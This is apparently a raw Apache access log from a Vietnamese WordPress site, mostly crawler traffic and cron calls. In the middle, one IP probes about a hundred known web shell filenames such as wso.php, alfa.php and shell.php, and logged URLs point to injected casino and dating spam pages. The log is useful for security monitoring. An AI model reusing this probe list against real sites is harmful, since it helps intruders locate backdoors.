45.55.220.171 - - [07/Sep/2025:01:27:15 +0700] "POST /xmlrpc.php HTTP/1.0" 200 956 "https://vattusacky.vn" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15"
45.117.177.72 - - [07/Sep/2025:01:29:34 +0700] "POST /wp-cron.php?doing_wp_cron=1757183374.6004519462585449218750 HTTP/1.0" 200 416 "-" "WordPress/6.8.1; https://vattusacky.vn"
5.255.231.61 - - [07/Sep/2025:01:29:33 +0700] "GET /pin-ap-kazino-oficialnyj-sajt-igrat-v-onlajn-4/ HTTP/1.0" 200 249965 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
45.117.177.72 - - [07/Sep/2025:01:30:49 +0700] "POST /wp-cron.php?doing_wp_cron=1757183449.2896471023559570312500 HTTP/1.0" 200 416 "-" "WordPress/6.8.1; https://vattusacky.vn"
103.57.130.129 - - [07/Sep/2025:01:30:47 +0700] "POST /xmlrpc.php HTTP/1.0" 200 956 "https://vattusacky.vn" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0.1) Gecko/20100101 Firefox/125.0.1"
45.117.177.72 - - [07/Sep/2025:01:35:07 +0700] "POST /wp-cron.php?doing_wp_cron=1757183707.4400579929351806640625 HTTP/1.0" 200 416 "-" "WordPress/6.8.1; https://vattusacky.vn"
87.250.224.94 - - [07/Sep/2025:01:35:06 +0700] "GET /the-7-finest-dating-apps-websites-in-ny-city-2023-june-replace/ HTTP/1.0" 200 73395 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
185.191.171.1 - - [07/Sep/2025:01:35:13 +0700] "GET /the/tram-lay-mau-bui-pm-2-5/page/1/ HTTP/1.0" 301 572 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.212 - - [07/Sep/2025:01:35:17 +0700] "GET /the/tram-lay-mau-bui-pm-2-5/ HTTP/1.0" 200 183764 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
45.117.177.72 - - [07/Sep/2025:01:38:53 +0700] "POST /wp-cron.php?doing_wp_cron=1757183933.5905458927154541015625 HTTP/1.0" 200 416 "-" "WordPress/6.8.1; https://vattusacky.vn"
18.207.79.144 - - [07/Sep/2025:01:38:52 +0700] "GET /loantiennhanh-la-gi-tamo-nv/ HTTP/1.0" 200 208502 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
54.144.185.255 - - [07/Sep/2025:01:38:56 +0700] "GET /category/uncategorized/page/92/ HTTP/1.0" 200 75740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
45.117.177.72 - - [07/Sep/2025:01:42:26 +0700] "POST /wp-cron.php?doing_wp_cron=1757184146.4247069358825683593750 HTTP/1.0" 200 416 "-" "WordPress/6.8.1; https://vattusacky.vn"
87.250.224.21 - - [07/Sep/2025:01:42:25 +0700] "GET /the/may-do-toc/ HTTP/1.0" 200 74028 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
45.117.177.72 - - [07/Sep/2025:01:44:24 +0700] "POST /wp-cron.php?doing_wp_cron=1757184264.4212191104888916015625 HTTP/1.0" 200 416 "-" "WordPress/6.8.1; https://vattusacky.vn"
216.244.66.237 - - [07/Sep/2025:01:44:23 +0700] "GET /robots.txt HTTP/1.0" 200 984 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
85.208.96.207 - - [07/Sep/2025:01:44:30 +0700] "GET /the/bom-lay-mau-bui-the-tich-lon/page/1/ HTTP/1.0" 301 577 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.5 - - [07/Sep/2025:01:44:33 +0700] "GET /the/bom-lay-mau-bui-the-tich-lon/ HTTP/1.0" 200 190368 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
45.117.177.72 - - [07/Sep/2025:01:51:14 +0700] "POST /wp-cron.php?doing_wp_cron=1757184674.0848860740661621093750 HTTP/1.0" 200 416 "-" "WordPress/6.8.1; https://vattusacky.vn"
52.187.57.17 - - [07/Sep/2025:01:51:12 +0700] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.0" 404 70812 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:14 +0700] "GET /abcd.php HTTP/1.0" 403 569 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:14 +0700] "GET /nc4.php HTTP/1.0" 403 568 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:14 +0700] "GET /we.php HTTP/1.0" 403 567 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:15 +0700] "GET /lock360.php HTTP/1.0" 403 572 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:15 +0700] "GET /class.php HTTP/1.0" 403 570 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:15 +0700] "GET /d.php HTTP/1.0" 403 566 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:15 +0700] "GET /file15.php HTTP/1.0" 403 571 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:15 +0700] "GET /php.php HTTP/1.0" 403 568 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:15 +0700] "GET /W.php HTTP/1.0" 403 566 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:15 +0700] "GET /ar.php HTTP/1.0" 403 567 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:15 +0700] "GET /file.php? HTTP/1.0" 403 569 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:15 +0700] "GET /item.php HTTP/1.0" 403 569 "-" "-"
45.117.177.72 - - [07/Sep/2025:01:51:17 +0700] "POST /wp-cron.php?doing_wp_cron=1757184677.2054080963134765625000 HTTP/1.0" 200 416 "-" "WordPress/6.8.1; https://vattusacky.vn"
52.187.57.17 - - [07/Sep/2025:01:51:16 +0700] "GET /admin.php?p= HTTP/1.0" 301 665 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:17 +0700] "GET /admin.php HTTP/1.0" 404 70666 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:18 +0700] "GET /cache.php HTTP/1.0" 403 570 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:18 +0700] "GET /buy.php HTTP/1.0" 403 568 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:19 +0700] "GET /lv.php HTTP/1.0" 403 567 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:19 +0700] "GET /cong.php HTTP/1.0" 403 569 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:19 +0700] "GET /about.php?p= HTTP/1.0" 403 570 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:19 +0700] "GET /repair.php HTTP/1.0" 403 571 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:19 +0700] "GET /wp-admin/maint/about.php7 HTTP/1.0" 404 70666 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:20 +0700] "GET /js.php HTTP/1.0" 403 567 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:20 +0700] "GET /wso.php HTTP/1.0" 403 568 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:21 +0700] "GET /view.php HTTP/1.0" 403 569 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:21 +0700] "GET /goods.php HTTP/1.0" 403 570 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:21 +0700] "GET /admin.php HTTP/1.0" 404 70666 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:22 +0700] "GET /jlc14ng3.php HTTP/1.0" 403 573 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:22 +0700] "GET /num.php HTTP/1.0" 403 568 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:22 +0700] "GET /makeasmtp.php?p= HTTP/1.0" 403 574 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:23 +0700] "GET /moon.php?p= HTTP/1.0" 403 569 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:23 +0700] "GET /simple.php HTTP/1.0" 403 571 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:23 +0700] "GET /atomlib.php HTTP/1.0" 403 572 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:23 +0700] "GET /karak.php HTTP/1.0" 403 570 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:23 +0700] "GET /function.php HTTP/1.0" 403 573 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:23 +0700] "GET /classwithtostring.php HTTP/1.0" 403 582 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:23 +0700] "GET /wp-activate.php HTTP/1.0" 302 526 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:23 +0700] "GET /wp-login.php?action=register HTTP/1.0" 302 692 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:25 +0700] "GET /wp-login.php?registration=disabled HTTP/1.0" 200 11447 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:27 +0700] "GET /f.php HTTP/1.0" 403 566 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:27 +0700] "GET /autoload_classmap.php?p= HTTP/1.0" 403 582 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:27 +0700] "GET /uhddppix.php HTTP/1.0" 403 573 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:28 +0700] "GET /qwturjyu.php HTTP/1.0" 403 573 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:28 +0700] "GET /index.php0 HTTP/1.0" 404 70666 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:29 +0700] "GET /gqksqsxc.php HTTP/1.0" 403 573 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:29 +0700] "GET /radio.php HTTP/1.0" 403 570 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:29 +0700] "GET /as.php HTTP/1.0" 403 567 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:29 +0700] "GET /0.php HTTP/1.0" 403 566 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:30 +0700] "GET /alfa.php HTTP/1.0" 403 569 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:30 +0700] "GET /inputs.php?p= HTTP/1.0" 301 520 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:31 +0700] "GET /inputs.php HTTP/1.0" 404 70666 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:32 +0700] "GET /ty.php?p= HTTP/1.0" 403 567 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:32 +0700] "GET /content.php HTTP/1.0" 403 572 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:32 +0700] "GET /v2.php HTTP/1.0" 403 567 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:33 +0700] "GET /403.php HTTP/1.0" 403 568 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:33 +0700] "GET /.htaccess.php HTTP/1.0" 403 574 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:33 +0700] "GET /shell.php HTTP/1.0" 403 570 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:33 +0700] "GET /admin836.php HTTP/1.0" 403 573 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:33 +0700] "GET /3.php HTTP/1.0" 403 566 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:33 +0700] "GET /I3zu2h.php HTTP/1.0" 403 571 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:33 +0700] "GET /pu1.php HTTP/1.0" 403 568 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:33 +0700] "GET /data532.php HTTP/1.0" 403 572 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:33 +0700] "GET /helper043.php HTTP/1.0" 403 574 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:33 +0700] "GET /core885.php HTTP/1.0" 403 572 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:34 +0700] "GET /wp.php HTTP/1.0" 403 567 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:34 +0700] "GET /xx.php HTTP/1.0" 403 567 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:34 +0700] "GET /rss.php HTTP/1.0" 403 568 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:34 +0700] "GET /mar.php HTTP/1.0" 403 568 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:34 +0700] "GET /themes.php HTTP/1.0" 404 70666 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:35 +0700] "GET /warm.PhP7 HTTP/1.0" 404 70666 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:37 +0700] "GET /ava.php HTTP/1.0" 403 568 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:37 +0700] "GET /hugo.php HTTP/1.0" 403 569 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:37 +0700] "GET /406.php HTTP/1.0" 403 568 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:37 +0700] "GET /xmrlpc.php?p= HTTP/1.0" 403 571 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:37 +0700] "GET /about.php HTTP/1.0" 403 570 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:37 +0700] "GET /00.php HTTP/1.0" 403 567 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:38 +0700] "GET /11.php HTTP/1.0" 403 567 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:38 +0700] "GET /byp.php HTTP/1.0" 403 568 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:38 +0700] "GET /chosen.php?p= HTTP/1.0" 403 571 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:38 +0700] "GET /error.php HTTP/1.0" 403 570 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:38 +0700] "GET /asasx.php?p= HTTP/1.0" 403 570 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:38 +0700] "GET /1.php HTTP/1.0" 403 566 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:38 +0700] "GET /elp.php HTTP/1.0" 403 568 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:38 +0700] "GET /mini.php HTTP/1.0" 403 569 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:38 +0700] "GET /adminfuns.php HTTP/1.0" 404 70666 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:40 +0700] "GET /asd67.php HTTP/1.0" 403 570 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:40 +0700] "GET /lc.php HTTP/1.0" 403 567 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:40 +0700] "GET /222.php?p= HTTP/1.0" 403 568 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:40 +0700] "GET /wp-22.php HTTP/1.0" 403 570 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:40 +0700] "GET /sts.php HTTP/1.0" 403 568 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:40 +0700] "GET /sa.php7 HTTP/1.0" 404 70666 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:42 +0700] "GET /shell_wso.php7 HTTP/1.0" 404 70666 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:43 +0700] "GET /gh.php HTTP/1.0" 403 567 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:43 +0700] "GET /red.php HTTP/1.0" 403 568 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:43 +0700] "GET /shellv3.php HTTP/1.0" 403 572 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:43 +0700] "GET /mah.php HTTP/1.0" 403 568 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:43 +0700] "GET /ee8.php HTTP/1.0" 403 568 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:44 +0700] "GET /up.php HTTP/1.0" 403 567 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:44 +0700] "GET /success.php HTTP/1.0" 403 572 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:44 +0700] "GET /atombil.php HTTP/1.0" 403 572 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:44 +0700] "GET /sxo.php HTTP/1.0" 403 568 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:44 +0700] "GET /fox.php HTTP/1.0" 403 568 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:44 +0700] "GET /g3.php HTTP/1.0" 403 567 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:44 +0700] "GET /too.php HTTP/1.0" 403 568 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:44 +0700] "GET /NewFile.php HTTP/1.0" 403 572 "-" "-"
52.187.57.17 - - [07/Sep/2025:01:51:44 +0700] "GET /akc.php HTTP/1.0" 403 568 "-" "-"
45.117.177.72 - - [07/Sep/2025:01:53:37 +0700] "POST /wp-cron.php?doing_wp_cron=1757184816.9323129653930664062500 HTTP/1.0" 200 416 "-" "WordPress/6.8.1; https://vattusacky.vn"
217.113.194.79 - - [07/Sep/2025:01:53:35 +0700] "GET /defying-societal-stigmas-embracing-non-traditional-relationships-on-omegle/feed/ HTTP/1.0" 200 1819 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
154.54.249.200 - - [07/Sep/2025:01:53:55 +0700] "GET /slot-gacor-rahasia-menang-besar-di-dunia-permainan-slot-online/feed/ HTTP/1.0" 200 1786 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
45.117.177.72 - - [07/Sep/2025:01:54:17 +0700] "POST /wp-cron.php?doing_wp_cron=1757184857.0208139419555664062500 HTTP/1.0" 200 416 "-" "WordPress/6.8.1; https://vattusacky.vn"
217.113.194.75 - - [07/Sep/2025:01:54:15 +0700] "GET /the-benefits-of-random-chats-how-omegle-and-ometv-can-expand-your-horizons/feed/ HTTP/1.0" 200 1819 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
40.77.167.116 - - [07/Sep/2025:01:54:24 +0700] "GET /understanding-the-risks-of-sharing-personal-information-on-omegle/feed/ HTTP/1.0" 200 1792 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
217.113.194.81 - - [07/Sep/2025:01:54:38 +0700] "GET /vulkan-vegas-bonus-bez-depozytu-50-spinow-czy-25-eur-736/ HTTP/1.0" 200 90214 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
185.191.171.12 - - [07/Sep/2025:01:54:55 +0700] "GET /robots.txt HTTP/1.0" 200 984 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.193 - - [07/Sep/2025:01:54:57 +0700] "GET /in-which-can-i-meet-up-with-girls-via-the-internet/ HTTP/1.0" 200 208449 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
217.113.194.74 - - [07/Sep/2025:01:55:01 +0700] "GET /is-omegle-safe-for-kids-parental-guidelines-for-monitoring-and-supervising-chat-activities/feed/ HTTP/1.0" 200 1867 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
45.117.177.72 - - [07/Sep/2025:01:55:22 +0700] "POST /wp-cron.php?doing_wp_cron=1757184922.6153259277343750000000 HTTP/1.0" 200 416 "-" "WordPress/6.8.1; https://vattusacky.vn"
217.113.194.76 - - [07/Sep/2025:01:55:21 +0700] "GET /the-growing-popularity-of-omegle-and-ometv-what-drives-users-to-these-platforms/feed/ HTTP/1.0" 200 1834 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.78 - - [07/Sep/2025:01:55:40 +0700] "GET /the-art-of-revealing-and-concealing-navigating-anonymity-and-authenticity-on-omegle/feed/ HTTP/1.0" 200 1846 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.77 - - [07/Sep/2025:01:56:04 +0700] "GET /evolusi-slot-thailand-game-baru-di-evo88-yang-wajib-dicoba/feed/ HTTP/1.0" 200 1774 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
45.117.177.72 - - [07/Sep/2025:01:56:41 +0700] "POST /wp-cron.php?doing_wp_cron=1757185001.2777299880981445312500 HTTP/1.0" 200 416 "-" "WordPress/6.8.1; https://vattusacky.vn"
154.54.249.200 - - [07/Sep/2025:01:56:40 +0700] "GET /1win-fribet-pri-registratsii-bonus-za-registratsiju-v-bk-1vin/feed/ HTTP/1.0" 200 1822 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.218 - - [07/Sep/2025:01:56:59 +0700] "GET /managing-expectations-in-anonymous-omegle-conversations-balancing-fiction-and-reality/feed/ HTTP/1.0" 200 1852 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
45.117.177.72 - - [07/Sep/2025:01:57:20 +0700] "POST /wp-cron.php?doing_wp_cron=1757185040.3207080364227294921875 HTTP/1.0" 200 416 "-" "WordPress/6.8.1; https://vattusacky.vn"
217.113.194.72 - - [07/Sep/2025:01:57:19 +0700] "GET /managing-relationships-video-chat-on-omegle-vs-text-chat-on-ometv/feed/ HTTP/1.0" 200 1792 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
185.191.171.12 - - [07/Sep/2025:01:57:30 +0700] "GET /category/uncategorized/page/297/ HTTP/1.0" 200 76362 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
217.113.194.81 - - [07/Sep/2025:01:57:38 +0700] "GET /unveiling-cultural-diversity-through-omegle-vs-ometv-a-comprehensive-study/ HTTP/1.0" 200 89569 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.75 - - [07/Sep/2025:01:57:59 +0700] "GET /wasting-time-or-finding-meaning-the-purpose-of-omegle-and-ometv-in-users-lives/feed/ HTTP/1.0" 200 1831 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
45.117.177.72 - - [07/Sep/2025:01:58:20 +0700] "POST /wp-cron.php?doing_wp_cron=1757185100.2162001132965087890625 HTTP/1.0" 200 416 "-" "WordPress/6.8.1; https://vattusacky.vn"
217.113.194.73 - - [07/Sep/2025:01:58:18 +0700] "GET /category/codigo-promocional-1xbet-espana-guia-de-registro-y-apuestas-119/ HTTP/1.0" 200 61900 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.74 - - [07/Sep/2025:01:58:40 +0700] "GET /category/codigo-promocional-1xbet-espana-guia-de-registro-y-apuestas-119/feed/ HTTP/1.0" 200 61032 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.73 - - [07/Sep/2025:01:59:03 +0700] "GET /san-pham/bo-dau-lay-mau-bui-pm-2-5-sibata-hv-500r/feed/ HTTP/1.0" 200 1710 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
45.117.177.72 - - [07/Sep/2025:01:59:23 +0700] "POST /wp-cron.php?doing_wp_cron=1757185163.4473578929901123046875 HTTP/1.0" 200 416 "-" "WordPress/6.8.1; https://vattusacky.vn"
154.54.249.200 - - [07/Sep/2025:01:59:22 +0700] "GET /san-pham/bo-dau-lay-mau-bui-pm-10-sibata-hv-500r/feed/ HTTP/1.0" 200 1707 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.76 - - [07/Sep/2025:01:59:41 +0700] "GET /san-pham/bo-pha-mau-kjeldahl-06-vi-tri-velp-dk6/feed/ HTTP/1.0" 200 1696 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
185.191.171.4 - - [07/Sep/2025:01:59:43 +0700] "GET /danh-gia-phan-mem-senmo-cashberry-advance/ HTTP/1.0" 200 216018 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
217.113.194.75 - - [07/Sep/2025:02:00:01 +0700] "GET /san-pham/bo-pha-mau-kjeldahl-08-vi-tri-velp-dk8/feed/ HTTP/1.0" 200 1693 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
185.191.171.4 - - [07/Sep/2025:02:00:05 +0700] "GET /danh-muc/moi-truong-khi/bom-lay-mau-bui-tsp-pm10-pm2-5/page/1/ HTTP/1.0" 301 599 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.195 - - [07/Sep/2025:02:00:08 +0700] "GET /danh-muc/moi-truong-khi/bom-lay-mau-bui-tsp-pm10-pm2-5/ HTTP/1.0" 200 169060 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
45.117.177.72 - - [07/Sep/2025:02:00:22 +0700] "POST /wp-cron.php?doing_wp_cron=1757185221.9791009426116943359375 HTTP/1.0" 200 416 "-" "WordPress/6.8.1; https://vattusacky.vn"
154.54.249.200 - - [07/Sep/2025:02:00:20 +0700] "GET /san-pham/bo-dung-cu-lay-mau-dat-3%C2%BC-soil-sampler-kit/feed/ HTTP/1.0" 200 1724 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.73 - - [07/Sep/2025:02:00:40 +0700] "GET /san-pham/bom-lay-mau-khi-luu-luong-thap-0-5-1-5-lpm/ HTTP/1.0" 200 184370 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
45.117.177.72 - - [07/Sep/2025:02:01:16 +0700] "POST /wp-cron.php?doing_wp_cron=1757185276.3090229034423828125000 HTTP/1.0" 200 416 "-" "WordPress/6.8.1; https://vattusacky.vn"
217.113.194.75 - - [07/Sep/2025:02:01:15 +0700] "GET /san-pham/bom-lay-mau-bui-tsp-150-1000-lpm-choi-than-3/feed/ HTTP/1.0" 200 1714 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.217 - - [07/Sep/2025:02:01:33 +0700] "GET /san-pham/thiet-bi-lay-mau-khi-luu-luong-thap-c2p/feed/ HTTP/1.0" 200 1733 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
216.244.66.237 - - [07/Sep/2025:02:01:47 +0700] "GET /safety-tips-for-using-ometv/ HTTP/1.0" 200 90392 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
217.113.194.72 - - [07/Sep/2025:02:01:52 +0700] "GET /san-pham/chai-dung-dich-hoa-chat-do-o2-fyrite-fyrite-fluid/ HTTP/1.0" 200 100204 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.76 - - [07/Sep/2025:02:02:14 +0700] "GET /san-pham/may-khuay-tron-tclp-theo-epa-1311-08-vi-tri/ HTTP/1.0" 200 116106 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
45.117.177.72 - - [07/Sep/2025:02:02:38 +0700] "POST /wp-cron.php?doing_wp_cron=1757185358.6280670166015625000000 HTTP/1.0" 200 416 "-" "WordPress/6.8.1; https://vattusacky.vn"
217.113.194.77 - - [07/Sep/2025:02:02:37 +0700] "GET /san-pham/tram-lay-mau-bui-tsp-khong-choi-than-2-cap-3/feed/ HTTP/1.0" 200 1714 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.73 - - [07/Sep/2025:02:02:56 +0700] "GET /san-pham/tram-lay-mau-bui-tsp-khong-choi-than-2-cap-3/ HTTP/1.0" 200 373504 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
45.117.177.72 - - [07/Sep/2025:02:03:39 +0700] "POST /wp-cron.php?doing_wp_cron=1757185419.2663960456848144531250 HTTP/1.0" 200 416 "-" "WordPress/6.8.1; https://vattusacky.vn"
91.121.133.168 - - [07/Sep/2025:02:03:37 +0700] "POST /xmlrpc.php HTTP/1.0" 200 956 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0"
217.113.194.76 - - [07/Sep/2025:02:03:43 +0700] "GET /san-pham/tram-lay-mau-bui-tsp-khong-choi-than-3-cap-2/feed/ HTTP/1.0" 200 1714 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
